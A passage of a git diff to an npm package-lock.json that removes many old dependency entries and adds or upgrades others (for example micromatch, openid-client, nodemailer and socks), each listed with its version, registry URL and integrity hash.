"https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", - "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", - "devOptional": true, - "requires": { - "yallist": "^4.0.0" - } - }, - "make-dir": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-3.1.0.tgz", - "integrity": "sha512-g3FeP20LNwhALb/6Cz6Dd4F2ngze0jz7tbzrD2wAV+o9FeNHe4rL+yK2md0J/fiSf1sa1ADhXqi5+oVwOM/eGw==", - "dev": true, - "requires": { - "semver": "^6.0.0" - } - }, - "make-error": { - "version": "1.3.6", - "resolved": "https://registry.npmjs.org/make-error/-/make-error-1.3.6.tgz", - "integrity": "sha512-s8UhlNe7vPKomQhC1qFelMokr/Sc3AgNbso3n74mVPA5LTZwkB9NlXf4XPamLxJE8h0gh73rM94xvwRT2CVInw==", + "jsbn": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-1.1.0.tgz", + "integrity": "sha512-4bYVV3aAMtDTTu4+xsDYa6sy9GyJ69/amsu9sYF2zqjiEoZA5xJi3BrfX3uY+/IekIu7MwdObdbDWpoZdBv3/A==", + "dev": true + }, + "jsep": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/jsep/-/jsep-1.4.0.tgz", + "integrity": "sha512-B7qPcEVE3NVkmSJbaYxvv4cHkVW7DQsZz13pUMrfS8z8Q/BuShN+gcTXrUlPiGqM2/t/EEaI030bpxMqY8gMlw==", "dev": true }, - "makeerror": { - "version": "1.0.12", - "resolved": "https://registry.npmjs.org/makeerror/-/makeerror-1.0.12.tgz", - "integrity": "sha512-JmqCvUhmt43madlpFzG4BQzG2Z3m6tvQDNKdClZnO3VbIudJYmxsT0FNJMeiB2+JTSlTQTSbU8QdesVmwJcmLg==", + "jsonpath-plus": { + "version": "10.3.0", + "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-10.3.0.tgz", + "integrity": "sha512-8TNmfeTCk2Le33A3vRRwtuworG/L5RrgMvdjhKZxvyShO+mBu2fP50OWUjRLNtvw344DdDarFh9buFAZs5ujeA==", "dev": true, "requires": { - "tmpl": "1.0.5" + "@jsep-plugin/assignment": "^1.3.0", + "@jsep-plugin/regex": "^1.0.4", + "jsep": "^1.4.0" } }, - "merge-stream": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/merge-stream/-/merge-stream-2.0.0.tgz", - "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==", - "dev": true + "lodash": { + "version": "4.17.21", + "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz", + "integrity": "sha512-v2kDEe57lecTulaDIuNTPy3Ry4gLGJ6Z1O3vE1krgXZNrsQ+LFTGHVxVjcXPs17LhbZVGedAJv8XZ1tvj5FvSg==" + }, + "math-intrinsics": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/math-intrinsics/-/math-intrinsics-1.1.0.tgz", + "integrity": "sha512-/IXtbwEk5HTPyEwyKX6hGkYXxM9nbj64B+ilVJnC/R6B0pH5G4V3b0pVbL7DBj4tkhBAppbQUlf6F6Xl9LHu1g==" }, "micromatch": { - "version": "4.0.4", - "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.4.tgz", - "integrity": "sha512-pRmzw/XUcwXGpD9aI9q/0XOwLNygjETJ8y0ao0wdqprrzDa4YnxLcz7fQRZr8voh8V10kGhABbNcHVk5wHgWwg==", + "version": "4.0.8", + "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.8.tgz", + "integrity": "sha512-PXwfBhYu0hBCPw8Dn0E+WDYb7af3dSLVWKi3HGv84IdF4TyFoC0ysxFd0Goxw7nSv4T/PzEJQxsYsEiFCKo2BA==", "dev": true, "requires": { - "braces": "^3.0.1", - "picomatch": "^2.2.3" + "braces": "^3.0.3", + "picomatch": "^2.3.1" + }, + "dependencies": { + "picomatch": { + "version": "2.3.1", + "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", + "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", + "dev": true + } } }, "mime-db": { @@ -8419,86 +2370,26 @@ "mime-db": "1.49.0" } }, - "mimic-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", - "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==", - "dev": true - }, - "minimatch": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", - "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", - "requires": { - "brace-expansion": "^1.1.7" - } - }, - "minipass": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-3.1.3.tgz", - "integrity": "sha512-Mgd2GdMVzY+x3IJ+oHnVM+KG3lA5c8tnabyJKmHSaG2kAGpudxuOf8ToDkhumF7UzME7DecbQE9uOZhNm7PuJg==", - "requires": { - "yallist": "^4.0.0" - } - }, - "minizlib": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/minizlib/-/minizlib-2.1.2.tgz", - "integrity": "sha512-bAxsR8BVfj60DWXHE3u30oHzfl4G7khkSuPW+qvpd7jFRHm7dLxOjUk1EHACJ/hxLY8phGJ0YhYHZo7jil7Qdg==", - "requires": { - "minipass": "^3.0.0", - "yallist": "^4.0.0" - } - }, - "mkdirp": { - "version": "1.0.4", - "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-1.0.4.tgz", - "integrity": "sha512-vVqVZQyf3WLx2Shd0qJ9xuvqgAyKPLAiqITEtqW0oIUjzo3PePDd6fW9iFz30ef7Ysp/oiWqbhszeGWW2T6Gzw==" - }, "ms": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", - "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", - "dev": true - }, - "natural-compare": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", - "integrity": "sha512-OWND8ei3VtNC9h7V60qff3SVobHr996CTwgxubgyQYEpg290h9J0buyECNNJexkFm5sOajh5G116RYA1c8ZMSw==", - "dev": true - }, - "node-int64": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/node-int64/-/node-int64-0.4.0.tgz", - "integrity": "sha1-h6kGXNs1XTGC2PlM4RGIuCXGijs=", - "dev": true - }, - "node-releases": { - "version": "1.1.74", - "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-1.1.74.tgz", - "integrity": "sha512-caJBVempXZPepZoZAPCWRTNxYQ+xtG/KAi4ozTA5A+nJ7IU+kLQCbqaUjb5Rwy14M9upBWiQ4NutcmW04LJSRw==", - "dev": true - }, - "nodemailer": { - "version": "6.9.9", - "resolved": "https://registry.npmjs.org/nodemailer/-/nodemailer-6.9.9.tgz", - "integrity": "sha512-dexTll8zqQoVJEZPwQAKzxxtFn0qTnjdQTchoU6Re9BUUGBJiOy3YMn/0ShTW6J5M0dfQ1NeDeRTTl4oIWgQMA==" - }, - "normalize-path": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", - "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", + "version": "2.1.3", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.3.tgz", + "integrity": "sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==", "dev": true }, - "npm-run-path": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/npm-run-path/-/npm-run-path-4.0.1.tgz", - "integrity": "sha512-S48WzZW777zhNIrn7gxOlISNAqi9ZC/uQFnRdbeIHhZhCA6UqpkOT8T1G7BvfdgP4Er8gF4sUbaS0i7QvIfCWw==", + "node-fetch": { + "version": "2.7.0", + "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.7.0.tgz", + "integrity": "sha512-c4FRfUm/dbcWZ7U+1Wq0AwCyFL+3nt2bEw05wfxSz+DWpWsitgmSgYmy2dQdWyKC1694ELPqMs/YzUSNozLt8A==", "dev": true, "requires": { - "path-key": "^3.0.0" + "whatwg-url": "^5.0.0" } }, + "nodemailer": { + "version": "6.10.1", + "resolved": "https://registry.npmjs.org/nodemailer/-/nodemailer-6.10.1.tgz", + "integrity": "sha512-Z+iLaBGVaSjbIzQ4pX6XV41HrooLsQ10ZWPUehGmuantvzWoDVBnmsdUcOIDM1t+yPor5pDhVlDESgOMEGxhHA==" + }, "nunjucks": { "version": "3.2.4", "resolved": "https://registry.npmjs.org/nunjucks/-/nunjucks-3.2.4.tgz", @@ -8509,322 +2400,62 @@ "commander": "^5.1.0" } }, - "oauth-sign": { - "version": "0.9.0", - "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", - "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==" - }, - "object-hash": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/object-hash/-/object-hash-2.2.0.tgz", - "integrity": "sha512-gScRMn0bS5fH+IuwyIFgnh9zBdo4DV+6GhygmWM9HyNJSgS0hScp1f5vjtm7oIIOiT9trXrShAkLFSc2IqKNgw==", - "optional": true - }, - "oidc-token-hash": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/oidc-token-hash/-/oidc-token-hash-5.0.1.tgz", - "integrity": "sha512-EvoOtz6FIEBzE+9q253HsLCVRiK/0doEJ2HCvvqMQb3dHZrP3WlJKYtJ55CRTw4jmYomzH4wkPuCj/I3ZvpKxQ==", - "optional": true + "oauth4webapi": { + "version": "3.5.5", + "resolved": "https://registry.npmjs.org/oauth4webapi/-/oauth4webapi-3.5.5.tgz", + "integrity": "sha512-1K88D2GiAydGblHo39NBro5TebGXa+7tYoyIbxvqv3+haDDry7CBE1eSYuNbOSsYCCU6y0gdynVZAkm4YPw4hg==", + "dev": true }, "once": { "version": "1.4.0", "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", "integrity": "sha1-WDsap3WWHUsROsF9nFC6753Xa9E=", - "requires": { - "wrappy": "1" - } - }, - "onetime": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/onetime/-/onetime-5.1.2.tgz", - "integrity": "sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==", "dev": true, "requires": { - "mimic-fn": "^2.1.0" + "wrappy": "1" } }, "openid-client": { - "version": "5.4.0", - "resolved": "https://registry.npmjs.org/openid-client/-/openid-client-5.4.0.tgz", - "integrity": "sha512-hgJa2aQKcM2hn3eyVtN12tEA45ECjTJPXCgUh5YzTzy9qwapCvmDTVPWOcWVL0d34zeQoQ/hbG9lJhl3AYxJlQ==", - "optional": true, - "requires": { - "jose": "^4.10.0", - "lru-cache": "^6.0.0", - "object-hash": "^2.0.1", - "oidc-token-hash": "^5.0.1" - } - }, - "p-limit": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", - "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", - "dev": true, - "requires": { - "p-try": "^2.0.0" - } - }, - "p-locate": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", - "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", - "dev": true, - "requires": { - "p-limit": "^2.2.0" - } - }, - "p-try": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", - "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==", - "dev": true - }, - "parse-json": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/parse-json/-/parse-json-5.2.0.tgz", - "integrity": "sha512-ayCKvm/phCGxOkYRSCM82iDwct8/EonSEgCSxWxD7ve6jHggsFl4fZVQBPRNgQoKiuV/odhFrGzQXZwbifC8Rg==", + "version": "6.6.2", + "resolved": "https://registry.npmjs.org/openid-client/-/openid-client-6.6.2.tgz", + "integrity": "sha512-Xya5TNMnnZuTM6DbHdB4q0S3ig2NTAELnii/ASie1xDEr8iiB8zZbO871OWBdrw++sd3hW6bqWjgcmSy1RTWHA==", "dev": true, "requires": { - "@babel/code-frame": "^7.0.0", - "error-ex": "^1.3.1", - "json-parse-even-better-errors": "^2.3.0", - "lines-and-columns": "^1.1.6" + "jose": "^6.0.11", + "oauth4webapi": "^3.5.4" } }, - "path-exists": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", - "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", - "dev": true - }, - "path-is-absolute": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", - "integrity": "sha1-F0uSaHNVNP+8es5r9TpanhtcX18=" - }, - "path-key": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", - "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", - "dev": true - }, - "path-parse": { - "version": "1.0.7", - "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", - "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==", - "dev": true - }, - "performance-now": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", - "integrity": "sha1-Ywn04OX6kT7BxpMHrjZLSzd8nns=" - }, - "picomatch": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.0.tgz", - "integrity": "sha512-lY1Q/PiJGC2zOv/z391WOTD+Z02bCgsFfvxoXXf6h7kv9o+WmsmzYqrAwY63sNgOxE4xEdq0WyUnXfKeBrSvYw==", - "dev": true - }, - "pirates": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/pirates/-/pirates-4.0.5.tgz", - "integrity": "sha512-8V9+HQPupnaXMA23c5hvl69zXvTwTzyAYasnkb0Tts4XvO4CliqONMOnvlq26rkhLC3nWDFBJf73LU1e1VZLaQ==", + "picocolors": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.1.1.tgz", + "integrity": "sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegNul7eNslCXP9FDj/Lcu0X8KEyMceP2ntpaHrDEVA==", "dev": true }, - "pkg-dir": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-4.2.0.tgz", - "integrity": "sha512-HRDzbaKjC+AOWVXxAU/x54COGeIv9eb+6CkDSQoNTt4XyWoIJvuPsXizxu/Fr23EiekbtZwmh1IcIG/l/a10GQ==", - "dev": true, - "requires": { - "find-up": "^4.0.0" - } - }, - "pretty-format": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-29.4.1.tgz", - "integrity": "sha512-dt/Z761JUVsrIKaY215o1xQJBGlSmTx/h4cSqXqjHLnU1+Kt+mavVE7UgqJJO5ukx5HjSswHfmXz4LjS2oIJfg==", - "dev": true, - "requires": { - "@jest/schemas": "^29.4.0", - "ansi-styles": "^5.0.0", - "react-is": "^18.0.0" - }, - "dependencies": { - "ansi-styles": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", - "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", - "dev": true - } - } - }, - "prompts": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/prompts/-/prompts-2.4.2.tgz", - "integrity": "sha512-NxNv/kLguCA7p3jE8oL2aEBsrJWgAakBpgmgK6lpPWV+WuOmY6r2/zbAVnP+T8bQlA0nzHXSJSJW0Hq7ylaD2Q==", - "dev": true, - "requires": { - "kleur": "^3.0.3", - "sisteransi": "^1.0.5" - } - }, "proxy-from-env": { "version": "1.1.0", "resolved": "https://registry.npmjs.org/proxy-from-env/-/proxy-from-env-1.1.0.tgz", "integrity": "sha512-D+zkORCbA9f1tdWRK0RaCR3GPv50cMxcrz4X8k5LTSUD1Dkw47mKJEZQNunItRTkWwgtaUSo1RVFRIG9ZXiFYg==" }, - "psl": { - "version": "1.8.0", - "resolved": "https://registry.npmjs.org/psl/-/psl-1.8.0.tgz", - "integrity": "sha512-RIdOzyoavK+hA18OGGWDqUTsCLhtA7IcZ/6NCs4fFJaHBDab+pDDmDIByWFRQJq2Cd7r1OoQxBGKOaztq+hjIQ==" - }, - "punycode": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.1.1.tgz", - "integrity": "sha512-XRsRjdf+j5ml+y/6GKHPZbrF/8p2Yga0JPtdqTIY2Xe5ohJPD9saDJJLPvp9+NSBprVvevdXZybnj2cv8OEd0A==" - }, - "qs": { - "version": "6.5.3", - "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", - "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==" - }, - "react-is": { - "version": "18.2.0", - "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.2.0.tgz", - "integrity": "sha512-xWGDIW6x921xtzPkhiULtthJHoJvBbF3q26fzloPCK0hsvxtPVelvftw3zjbHWSkR2km9Z+4uxbDDK/6Zw9B8w==", - "dev": true - }, - "request": { - "version": "2.88.2", - "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", - "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", - "requires": { - "aws-sign2": "~0.7.0", - "aws4": "^1.8.0", - "caseless": "~0.12.0", - "combined-stream": "~1.0.6", - "extend": "~3.0.2", - "forever-agent": "~0.6.1", - "form-data": "~2.3.2", - "har-validator": "~5.1.3", - "http-signature": "~1.2.0", - "is-typedarray": "~1.0.0", - "isstream": "~0.1.2", - "json-stringify-safe": "~5.0.1", - "mime-types": "~2.1.19", - "oauth-sign": "~0.9.0", - "performance-now": "^2.1.0", - "qs": "~6.5.2", - "safe-buffer": "^5.1.2", - "tough-cookie": "~2.5.0", - "tunnel-agent": "^0.6.0", - "uuid": "^3.3.2" - }, - "dependencies": { - "form-data": { - "version": "2.3.3", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", - "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", - "requires": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.6", - "mime-types": "^2.1.12" - } - } - } - }, - "require-directory": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz", - "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==", - "dev": true - }, - "resolve": { - "version": "1.20.0", - "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.20.0.tgz", - "integrity": "sha512-wENBPt4ySzg4ybFQW2TT1zMQucPK95HSh/nq2CFTZVOGut2+pQvSsgtda4d26YrYcr067wjbmzOG8byDPBX63A==", - "dev": true, - "requires": { - "is-core-module": "^2.2.0", - "path-parse": "^1.0.6" - } - }, - "resolve-cwd": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/resolve-cwd/-/resolve-cwd-3.0.0.tgz", - "integrity": "sha512-OrZaX2Mb+rJCpH/6CpSqt9xFVpN++x01XnN2ie9g6P5/3xelLAkXWVADpdz1IHD/KFfEXyE6V0U01OQ3UO2rEg==", + "pump": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/pump/-/pump-3.0.3.tgz", + "integrity": "sha512-todwxLMY7/heScKmntwQG8CXVkWUOdYxIvY2s0VWAAMh/nd8SoYiRaKjlr7+iCs984f2P8zvrfWcDDYVb73NfA==", "dev": true, "requires": { - "resolve-from": "^5.0.0" + "end-of-stream": "^1.1.0", + "once": "^1.3.1" } }, - "resolve-from": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", - "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", - "dev": true - }, - "resolve.exports": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-2.0.0.tgz", - "integrity": "sha512-6K/gDlqgQscOlg9fSRpWstA8sYe8rbELsSTNpx+3kTrsVCzvSl0zIvRErM7fdl9ERWDsKnrLnwB+Ne89918XOg==", + "react-is": { + "version": "18.3.1", + "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.3.1.tgz", + "integrity": "sha512-/LLMVyas0ljjAtoYiPqYiL8VWXzUUdThrmU5+n20DZv+a+ClRoevUzw5JxU+Ieh5/c87ytoTBV9G1FiKfNJdmg==", "dev": true }, "rfc4648": { "version": "1.5.0", "resolved": "https://registry.npmjs.org/rfc4648/-/rfc4648-1.5.0.tgz", - "integrity": "sha512-FA6W9lDNeX8WbMY31io1xWg+TpZCbeDKsBo0ocwACZiWnh9TUAyk9CCuBQuOPmYnwwdEQZmraQ2ZK7yJsxErBg==" - }, - "rimraf": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-3.0.2.tgz", - "integrity": "sha512-JZkJMZkAGFFPP2YqXZXPbMlMBgsxzE8ILs4lMIX/2o0L9UBw9O/Y3o6wFw/i9YLapcUJWwqbi3kdxIPdC62TIA==", - "requires": { - "glob": "^7.1.3" - } - }, - "safe-buffer": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", - "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==" - }, - "safer-buffer": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", - "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" - }, - "semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "dev": true - }, - "shebang-command": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", - "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", - "dev": true, - "requires": { - "shebang-regex": "^3.0.0" - } - }, - "shebang-regex": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", - "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", - "dev": true - }, - "signal-exit": { - "version": "3.0.7", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", - "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==", - "dev": true - }, - "sisteransi": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/sisteransi/-/sisteransi-1.0.5.tgz", - "integrity": "sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==", + "integrity": "sha512-FA6W9lDNeX8WbMY31io1xWg+TpZCbeDKsBo0ocwACZiWnh9TUAyk9CCuBQuOPmYnwwdEQZmraQ2ZK7yJsxErBg==", "dev": true }, "slash": { @@ -8833,42 +2464,31 @@ "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", "dev": true }, - "source-map": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", - "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", + "smart-buffer": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/smart-buffer/-/smart-buffer-4.2.0.tgz", + "integrity": "sha512-94hK0Hh8rPqQl2xXc3HsaBoOXKV20MToPkcXvwbISWLEs+64sBq5kFgn2kJDHb1Pry9yrP0dxrCI9RRci7RXKg==", "dev": true }, - "source-map-support": { - "version": "0.5.13", - "resolved": "https://registry.npmjs.org/source-map-support/-/source-map-support-0.5.13.tgz", - "integrity": "sha512-SHSKFHadjVA5oR4PPqhtAVdcBWwRYVd6g6cAXnIbRiIwc2EhPrTuKUBdSLvlEKyIP3GCf89fltvcZiP9MMFA1w==", + "socks": { + "version": "2.8.5", + "resolved": "https://registry.npmjs.org/socks/-/socks-2.8.5.tgz", + "integrity": "sha512-iF+tNDQla22geJdTyJB1wM/qrX9DMRwWrciEPwWLPRWAUEM8sQiyxgckLxWT1f7+9VabJS0jTGGr4QgBuvi6Ww==", "dev": true, "requires": { - "buffer-from": "^1.0.0", - "source-map": "^0.6.0" + "ip-address": "^9.0.5", + "smart-buffer": "^4.2.0" } }, - "sprintf-js": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.0.3.tgz", - "integrity": "sha1-BOaSb2YolTVPPdAVIDYzuFcpfiw=", - "dev": true - }, - "sshpk": { - "version": "1.16.1", - "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.16.1.tgz", - "integrity": "sha512-HXXqVUq7+pcKeLqqZj6mHFUMvXtOJt1uoUx09pFW6011inTMxqI8BA8PM95myrIyyKwdnzjdFjLiE6KBPVtJIg==", + "socks-proxy-agent": { + "version": "8.0.5", + "resolved": "https://registry.npmjs.org/socks-proxy-agent/-/socks-proxy-agent-8.0.5.tgz", + "integrity": "sha512-HehCEsotFqbPW9sJ8WVYB6UbmIMv7kUUORIF2Nncq4VQvBfNBLibW9YZR5dlYCSUhwcD628pRllm7n+E+YTzJw==", + "dev": true, "requires": { - "asn1": "~0.2.3", - "assert-plus": "^1.0.0", - "bcrypt-pbkdf": "^1.0.0", - "dashdash": "^1.12.0", - "ecc-jsbn": "~0.1.1", - "getpass": "^0.1.1", - "jsbn": "~0.1.0", - "safer-buffer": "^2.0.2", - "tweetnacl": "~0.14.0" + "agent-base": "^7.1.2", + "debug": "^4.3.4", + "socks": "^2.8.3" } }, "stack-utils": { @@ -8883,56 +2503,20 @@ "stream-buffers": { "version": "3.0.2", "resolved": "https://registry.npmjs.org/stream-buffers/-/stream-buffers-3.0.2.tgz", - "integrity": 